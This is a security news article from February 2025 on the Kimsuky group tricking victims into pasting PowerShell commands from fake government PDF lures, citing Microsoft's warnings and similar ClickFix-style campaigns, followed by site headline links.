North Korean Hackers Use PowerShell to Trick Victims

Elvis Emeka Ikeji Security 12 February 2025 Hits: 335

North Korean Hackers Use PowerShell to Trick Victims and Gain Control of Devices in New Cyberattack

A hacking group linked to North Korea, called Kimsuky, has been using a new trick to fool people into running harmful commands on their computers.

They pretend to be South Korean government officials and build trust with their targets over time. Then, they send a fake email with a PDF attachment.

When the victim tries to open the PDF, they are told to click a registration link for their Windows system. The link instructs them to:

Open PowerShell as an administrator.

Copy and paste the given code into the terminal.

Run the code—without knowing it’s harmful.

This method allows the hackers to take control of the victim’s computer.

The Microsoft Threat Intelligence team warned about this attack in a series of posts on X (formerly Twitter).

Should the victim follow through, the malicious code downloads and installs a browser-based remote desktop tool, along with a certificate file with a hardcoded PIN from a remote server.

The code then sends a web request to a remote server to register the victim device using the downloaded certificate and PIN. This allows the threat actor to access the device and carry out data exfiltration," Microsoft said.

The tech giant said it observed the use of this approach in limited attacks since January 2025, describing it as a departure from the threat actor's usual tradecraft.

It's worth noting that the Kimsuky is not the only North Korean hacking crew to adopt the compromise strategy. In December 2024, it was revealed that threat actors linked to the Contagious Interview campaign are tricking users into copying and executing a malicious command on their Apple macOS systems via the Terminal app so as to address a supposed problem with accessing the camera and microphone through the web browser.

These types of attacks, including those using the ClickFix method, have become much more common in recent months. A key reason for their success is that they trick victims into infecting their own computers, allowing hackers to bypass security protections.

WHAT ARE YOU LOOKING FOR?

Popular Tags

Senator Wyden Urges FTC to Probe Microsoft for Cybersecurity Negligence

U.S. Targets Russian and Chinese Entities in North Korean IT Scam

U.S. Busts 29 Laptop Farms Tied to North Korean IT Scam

U.S. Moves to Seize $225.3M Linked to Crypto Scams

Facebook Among Social Media Platforms Nepal Plans to Block

Japan Plans to Double Cybersecurity Workforce by 2030

Apple Moves Most U.S.-Bound iPhone Production Out of China

Indian Court Orders Block on Proton Mail Email Service

Czech Agency Warns of Chinese Espionage Threat to Infrastructure

Russia Blocks Telegram, WhatsApp Calls Over Law Violations

UK to Ban Public Sector from Paying Ransomware Gangs

UK’s Most Powerful Supercomputer Goes Live

Sovereign AI Cloud Debuts in South Africa via Touchnet–Zadara Alliance

Sui Opens Lagos Hub to Boost West Africa’s Blockchain Development

Axiz and Kaspersky Join Forces to Boost Cybersecurity in Africa

Schneider Electric Unveils First African Innovation Hub to Advance Digital Solutions

Pakistan's Government Launches Probe Into SIM Data Leak

Red Sea Cable Damage Disrupts Internet in Asia and Middleeast

Hackers Claim Breach of Saudi Industrial Services Firm

Nokia, e& UAE, and MediaTek Break 5G Speed Record in Middle East

Raleigh, NC

North Korean Hackers Use PowerShell to Trick Victims

Follow us on

Get Our Newsletter

Tech

Arm Launches New Mobile Chip Designs Geared for AI

Microsoft Builds Independence with New Internal AI Models

Anthropic Blocks Hackers Exploiting Claude AI

PromptLock: First Ransomware Built with OpenAI’s gpt-oss:20b

Category

Popular Sections

About